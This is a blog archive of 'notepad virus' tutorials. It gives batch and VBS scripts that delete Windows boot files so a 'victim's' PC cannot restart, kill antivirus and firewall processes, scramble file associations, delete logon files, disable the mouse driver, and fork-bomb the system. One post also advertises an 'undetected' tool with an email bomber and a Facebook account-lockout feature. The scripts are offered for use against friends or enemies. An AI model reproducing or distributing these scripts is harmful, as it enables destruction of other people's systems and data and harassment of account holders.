Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Permanently Shutdown Victim's Pc


Warning:
DO NOT CLICK THIS FILE ON YOUR COMPUTER.
YOU CAN'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Follow the Steps Below:


1. Open up notepad and copy and paste this code given below:


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


2.Save it as a .bat file.

This Will Permanently shutdown the persons computer.
It shuts it off once and deletes the files needed to reboot and restart. Enjoy!!!!!


Swiss Army Knife: A Must Have Hacking Tool


This is a very Useful Tool for Every PC User. Not Detected by Antivirus
Features:


1. Email Bomber: Send Unlimted Email to Vicitim.

2. Facebook Freezer: it Blocks Someone FB ID by Loging in With Unlimited Wrong Attempts.

3. Port Scanner: Scan Open Ports in PC.

4. Ping an IP

5. Batch File Maker: you can Make Virus with it

6. One Click Shutdown, Restart and LogOff.

and Many More......

Just Download it and Check it Out



Notepad Virus to Make Everything Go Wrong


If you want to make some one's pc like this:


1. Ends Process, NAVAPSVC.exe
2. Ends Process, Explorer.exe (taskbar and icons will dissapear)
3. Ends Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens


Just Copy This Below code In Notepad, Save as anything.bat and you are done!
<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>



title virus is my dna
color 0A
@echo off
set end=md “any message you want”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * any message you want
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * this is just the beginning.
msg * any message.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Warning: Do Not Try this at Your OWN PC

Make A Notepad Virus which hits Backspace Simultaneously


Well it’s a Notepad tricks which will Hits Backspace Simultaneously

Steps :

1. Open Notepad

2. Type:


MsgBox "LWTHacker" 
Set wshShell =wscript.CreateObject("WScript.Shell") 
do
 wscript.sleep 100
 wshshell.sendkeys "{bs}"
 loop

3. Save it as Virus.bat


4. Remember format should be .vbs, else it will not execute.

5. Then just double click this file to execute.

###### You can Change "{bs}" with "~(enter)" . then it will press Enter simultaneously

Note : To Stop It, open Task Manager and then End The Process wscript.exe

Destroy Any PC Easily With One Click


Well remember that don’t try this @ ur own computer in any circumstances because
the file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again,so u got it right well if u r pranking with ur friend or ur enemy remember that his or her will never restart unless new Windows is installed.

Here is the Guide to Destroying Virus:

1.Open up notepad and copy and paste this:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

2.And SAVE this file as .bat

3.Now that’s it ur Virus is ready well it’s a Monster Virus .

Warning : Do Not Try This Virus at Your Own PC


Make a FORKBOMB Virus Using Notepad


FORKBOMB VIRUS
It is Simplest virus called FORKBOMB virus.



Just open notepad
and type in

%0|%0

and save as anything.bat

This virus will jam the processor and hang/crash the computer.

It doesn't do any damage though.
Just restart and it will be fine

Make a MCQ Virus


Follow The Steps to Make MCQ (Multiple Choice Question) Virus.:

It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

1. Open Notepad and Copy the Following Code:

@echo off title 
The end of the world 
cd C:\ 
:menu
 cls 
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc... pause

 echo Pick your poison:

 echo 1. Die this way (Wimp)

 echo 2. Die this way (WIMP!)

 echo 3. DO NOT DIE THIS WAY

 echo 4. Die this way (you're boring)

 echo 5. Easy way out

 set input=nothing set /p input=Choice: 

if %input%==1 goto one 

if %input%==2 goto two 

2. Save it as "Anything.BAT" and send it to your Friend .



Disable Mouse In Window 7 Using Notepad Virus


Follow the Steps Below:

1. Open Notepad and copy below code:

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Save this file as  virus.bat

Done you just created your virus.